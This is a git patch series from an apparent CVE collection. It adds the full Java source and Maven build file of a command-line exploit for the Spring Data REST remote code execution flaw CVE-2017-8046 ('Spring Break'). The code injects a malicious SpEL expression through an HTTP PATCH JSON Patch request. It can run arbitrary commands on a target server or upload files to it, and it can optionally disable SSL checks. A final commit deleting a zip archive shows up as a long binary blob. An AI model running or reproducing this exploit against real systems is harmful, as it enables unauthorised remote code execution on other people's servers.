localFileToUpload; + + /** + * Server will upload the file to this location, e.g. /tmp or C:\TEMP. This path + * will be encoded to ensure that Spring will not convert slashes to dots. + */ + private String remoteUploadDirectory; + + /** + * Default constructor. + */ + public SpringBreakCve20178046() { + this.verbose = false; + this.cleanResponse = false; + this.errorStream = false; + this.skipSSL = false; + } + + /** + * Performs the exploit. + * + * @throws IOException + * If something bad occurs during HTTP GET. + */ + public void exploit() throws IOException { + checkInput(); + printInput(); + String payload = preparePayload(); + String response = httpPatch(payload); + printOutput(response); + } + + /** + * Checks the input. + */ + private void checkInput() { + if (this.url == null) { + throw new IllegalArgumentException("URL must be passed."); + } + + if ((isEmpty(this.command) && this.localFileToUpload == null) || (!isEmpty(this.command) && this.localFileToUpload != null)) { + throw new IllegalArgumentException("Either a command must be passed, or a file must be selected for upload."); + } + } + + /** + * Prints input if verbose flag is true. + */ + private void printInput() { + if (isVerbose()) { + System.out.println("[*] Target URL ........: " + this.url); + if (!isEmpty(this.command)) { + System.out.println("[*] Command ...........: " + this.command); + } + if (this.localFileToUpload != null) { + System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath()); + if (!isEmpty(this.remoteUploadDirectory)) { + System.out.println("[*] Remote upload dir .: " + this.remoteUploadDirectory); + } + } + System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies)); + System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? "(no headers)" : "(" + this.customHeaders.size() + " headers)")); + if (this.customHeaders != null && !this.customHeaders.isEmpty()) { + for (String header : this.customHeaders) { + System.out.println(" > " + header); + } + } + System.out.println("[*] Clean response ....: " + this.cleanResponse); + System.out.println("[*] Ret error stream ..: " + this.errorStream); + System.out.println("[*] Verbose ...........: " + this.verbose); + } + } + + /** + * Prepares the payload. + * + * @return The malicious payload that will be injected. + */ + private String preparePayload() { + System.out.println("[*] Preparing payload."); + String payload = null; + + // Send a command to the server: + if (!isEmpty(this.command)) { + String encodedCommand = encode(this.command); // Encoding inserted command. + String maliciousSpEL = String.format(COMMAND_PAYLOAD, encodedCommand, isErrorStream() ? ERROR_STREAM : INPUT_STREAM); + payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); // Placing payload into JSON Patch object. + } + + // Upload a file to the server: + else if (this.localFileToUpload != null) { + try { + // Remote preparing filename / directory. + String filename = this.localFileToUpload.getName(); + if (remoteUploadDirectory != null) { + filename = remoteUploadDirectory + filename; + filename = encode(filename); + } + + // Reading file content to byte[] instead of string avoids potential text encoding issues. + byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload); + String encodedFileContent = Base64.encodeBase64String(rawFileContent); + String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent); + payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); + + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + if (isVerbose()) { + System.out.println("[*] Payload ...........: " + payload); + } + + return payload; + } + + /** + * Encodes the inserted command. + * + * @return The encoded command. + */ + private String encode(String command) { + StringBuffer encodedCommand = new StringBuffer("(new java.lang.String(new char[]{"); + + int commandLength = command.length(); + for (int i = 0; i < commandLength; i++) { + encodedCommand.append((int) command.charAt(i)); + if (i + 1 < commandLength) { + encodedCommand.append(","); + } + } + + encodedCommand.append("}))"); + + if (isVerbose()) { + System.out.println("[*] Encoded command ...: " + encodedCommand.toString()); + } + + return encodedCommand.toString(); + } + + /** + * HTTP PATCH operation on the target passing the malicious payload. + * + * @param payload + * The malicious payload. + * @return The response as a string. + * @throws IOException + * If something bad occurs during HTTP GET. + */ + private String httpPatch(String payload) throws IOException { + System.out.println("[*] Sending payload."); + + // Preparing PATCH operation. + HttpClientBuilder clientBuilder = HttpClientBuilder.create(); + + // Disable SSL Verification + if(this.url.getScheme().equalsIgnoreCase("https") && this.skipSSL){ + try{ + SSLContextBuilder sslBuilder = new SSLContextBuilder(); + sslBuilder.loadTrustMaterial(null, new TrustSelfSignedStrategy()); + // Since certificates contain hostnames, not ip addresses, if we try https://ipAddress + // a SSLPeerUnverifiedException would be thrown because hostname in certificate does not match + // ip used in https://ipAddress, to avoid that error we need to use the overloaded constructor taking as second arg NoopHostnameVerifier. + SSLConnectionSocketFactory sslConnectionFactory = new SSLConnectionSocketFactory(sslBuilder.build(), NoopHostnameVerifier.INSTANCE); + clientBuilder.setSSLSocketFactory(sslConnectionFactory); + } catch(Exception exception) { + // Errors that may be thrown: KeyManagementException, KeyStoreException, NoSuchAlgorithmException, SSLPeerUnverifiedException + throw new RuntimeException(exception); + } + } + + HttpClient client = clientBuilder.build(); + + HttpPatch patch = new HttpPatch(this.url); + patch.setHeader("User-Agent", "Mozilla/5.0"); + patch.setHeader("Accept-Language", "en-US,en;q=0.5"); + patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch. + if (!isEmpty(this.cookies)) { + patch.setHeader("Cookie", this.cookies); + } + if (!customHeaders.isEmpty()) { + for (String header : this.customHeaders) { + String key = header.split(":")[0]; + String value = header.split(":")[1]; + patch.setHeader(key, value); + } + } + patch.setEntity(new StringEntity(payload)); + + // Response string. + StringBuffer response = new StringBuffer(); + + // Executing PATCH operation. + HttpResponse httpResponse = client.execute(patch); + if (httpResponse != null) { + + // Reading response code. + if (httpResponse.getStatusLine() != null) { + int responseCode = httpResponse.getStatusLine().getStatusCode(); + System.out.println("[*] HTTP " + responseCode); + } else { + System.out.println("[!] HTTP response code can't be read."); + } + + // Reading response content. + if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) { + BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent())); + String inputLine; + + while ((inputLine = in.readLine()) != null) { + response.append(inputLine); + response.append(System.getProperty("line.separator")); + } + in.close(); + } else { + System.out.println("[!] HTTP response content can't be read."); + } + + } else { + System.out.println("[!] HTTP response is null."); + } + + return response.toString(); + } + + /** + * Prints output. + * + * @param response + * Response that will be printed. + */ + private void printOutput(String response) { + if (!isEmpty(response)) { + System.out.println("[*] vvv Response vvv"); + + // Cleaning response (if possible). + if (isCleanResponse() && response.contains(ERROR_CAUSE)) { + String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0]; + System.out.println(cleanedResponse); + } else { + System.out.println(response); + } + + System.out.println("[*] ^^^ ======== ^^^"); + } + } + + /** + * Checks if an input string is null/empty or not. + * + * @param input + * The input string to check. + * @return True if the string is null or empty, false otherwise. + */ + private boolean isEmpty(String input) { + boolean isEmpty; + + if (input == null || input.trim().length() < 1) { + isEmpty = true; + } else { + isEmpty = false; + } + + return isEmpty; + } + + /* Getters and setters. */ + + public boolean isVerbose() { + return verbose; + } + + public void setVerbose(boolean verbose) { + this.verbose = verbose; + } + + public void setUrl(String url) throws URISyntaxException { + if (isEmpty(url)) { + throw new IllegalArgumentException("URL must be not null and not empty."); + } + + this.url = new URI(url.trim()); + } + + public void setCommand(String command) { + if (isEmpty(command)) { + throw new IllegalArgumentException("Command must be not null and not empty."); + } + + this.command = command.trim(); + } + + public void setCookies(String cookies) { + if (cookies != null) { + cookies = cookies.trim(); + } + + this.cookies = cookies; + } + + public void setSkipSSL(boolean skipSSL){ + this.skipSSL = skipSSL; + } + + public void setCustomHeader(String customHeader) { + if (customHeader != null && customHeader.contains(":") && !customHeader.startsWith(":") && !customHeader.endsWith(":")) { + customHeader = customHeader.trim(); + this.customHeaders.add(customHeader); + } + } + + public boolean isCleanResponse() { + return cleanResponse; + } + + public void setCleanResponse(boolean cleanResponse) { + this.cleanResponse = cleanResponse; + } + + public boolean isErrorStream() { + return errorStream; + } + + public void setErrorStream(boolean errorStream) { + this.errorStream = errorStream; + } + + public void setLocalFileToUpload(String localFileToUpload) { + if (isEmpty(localFileToUpload)) { + throw new IllegalArgumentException("Filename must not be null and not empty."); + } + + File upload = new File(localFileToUpload); + if (!upload.exists() || !upload.isFile() || !upload.canRead()) { + throw new IllegalArgumentException("File to upload does not exist or is not readable: " + upload.getAbsolutePath()); + } + + this.localFileToUpload = upload; + } + + public void setRemoteUploadDirectory(String remoteUploadDirectory) { + if (!remoteUploadDirectory.endsWith("/")) { + remoteUploadDirectory += "/"; + } + this.remoteUploadDirectory = remoteUploadDirectory; + } + + /** + * Shows the program help. + */ + public static final void help() { + System.out.println("Usage:"); + System.out.println(" java -jar spring-break_cve-2017-8046.jar [options]"); + System.out.println("Description:"); + System.out.println(" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046)."); + System.out.println("Options:"); + System.out.println(" -h, --help"); + System.out.println(" Prints this help and exits."); + System.out.println(" -u, --url [target_URL]"); + System.out.println(" The target URL where the exploit will be performed."); + System.out.println(" You have to choose an existent resource."); + System.out.println(" -cmd, --command [command_to_execute]"); + System.out.println(" The command that will be executed on the remote machine."); + System.out.println(" -U, --upload [file_to_upload]"); + System.out.println(" File to upload to the remote machine. Will be uploaded to the current working"); + System.out.println(" directory of the Java process. Warning: this will only succeed on a server running"); + System.out.println(" JRE-1.7 or later."); + System.out.println(" --remote-upload-directory [/some/existing/path/]"); + System.out.println(" Optional. Server will attempt to write the uploaded file to this directory on the"); + System.out.println(" filesystem. Specified directory must exist and be writeable."); + System.out.println(" --cookies [cookies]"); + System.out.println(" Optional. Cookies passed into the request, e.g. authentication cookies."); + System.out.println(" -H, --header [custom_header]"); + System.out.println(" Optional. Custom header passed into the request, e.g. authorization header."); + System.out.println(" -k"); + System.out.println(" Skip SSL validation"); + System.out.println(" --clean"); + System.out.println(" Optional. Removes error messages in output due to the usage of the"); + System.out.println(" exploit. It could hide error messages if the request fails for other reasons."); + System.out.println(" --error-stream"); + System.out.println(" Optional. In case of errors the command will fail and the error stream will"); + System.out.println(" not be returned. This option can be used to relaunch the remote command"); + System.out.println(" returning the error stream."); + System.out.println(" -v, --verbose"); + System.out.println(" Optional. Increase verbosity."); + } + + /** + * Main method. + * + * @param args + * Input arguments + */ + public static void main(String[] args) { + try { + System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION); + SpringBreakCve20178046 o = new SpringBreakCve20178046(); + + if (args.length > 0) { + for (int i = 0; i < args.length; i++) { + + String p = args[i]; + + if (("-h".equals(p) || "--help".equals(p)) && i == 0) { + SpringBreakCve20178046.help(); + return; + } else if ("-u".equals(p) || "--url".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("URL must be passed."); + } + o.setUrl(args[++i]); + + } else if ("-U".equals(p) || "--upload".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("File must be passed, if specified."); + } + o.setLocalFileToUpload(args[++i].trim()); + + } else if ("--remote-upload-directory".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Remote directory must be passed, if specified."); + } + o.setRemoteUploadDirectory(args[++i].trim()); + + } else if ("-cmd".equals(p) || "--command".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Command must be passed."); + } + o.setCommand(args[++i]); + + } else if ("--cookies".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Cookies must be passed, if specified."); + } + o.setCookies(args[++i]); + + } else if ("-k".equals(p)) { + + o.setSkipSSL(true); + + } else if ("-H".equals(p) || "--header".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Custom header must be passed, if specified."); + } + o.setCustomHeader(args[++i]); + + } else if ("--clean".equals(p)) { + o.setCleanResponse(true); + } else if ("--error-stream".equals(p)) { + o.setErrorStream(true); + } else if ("-v".equals(p) || "--verbose".equals(p)) { + o.setVerbose(true); + } + + } + + // Performing the exploit. + o.exploit(); + + } else { // Wrong number of arguments. + SpringBreakCve20178046.help(); + return; + } + + } catch (URISyntaxException use) { + System.out.println("[!] Input error (URI syntax exception): " + use.getMessage()); + } catch (IllegalArgumentException iae) { + System.out.println("[!] Input error (illegal argument): " + iae.getMessage()); + } catch (Exception e) { + System.out.println("[!] Unexpected exception: " + e.getMessage()); + e.printStackTrace(); + } + } + +} diff --git a/cve/java-spring/2017/CVE-2017-8046/pom.xml b/cve/java-spring/2017/CVE-2017-8046/pom.xml new file mode 100644 index 00000000..0cb3f6ed --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/pom.xml @@ -0,0 +1,68 @@ + + 4.0.0 + com.afs.exploit + spring-break_cve-2017-8046 + 1.3 + spring-break_cve-2017-8046 + This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + + 1.7 + 1.7 + + + src/main/java + + + maven-compiler-plugin + 3.1 + + + + + + + org.apache.maven.plugins + maven-assembly-plugin + + + package + + single + + + + + com.afs.exploit.spring.SpringBreakCve20178046 + + + + jar-with-dependencies + + + + + + + + + + org.apache.httpcomponents + httpclient + 4.5.5 + + + + + commons-io + commons-io + 2.6 + + + https://github.com/m3ssap0/spring-break_cve-2017-8046 + \ No newline at end of file From 4cc2e0816d79a4150ce8db51105d3637ac06c52a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:57:17 +0000 Subject: [PATCH 101/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/CVE-2017-8046/spring-break=5Fcve-2017-8046?= =?UTF-8?q?-master.zip?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../spring-break_cve-2017-8046-master.zip | Bin 12833 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip deleted file mode 100644 index 078e924350cf580703b34d31477354a894198a3b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12833 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 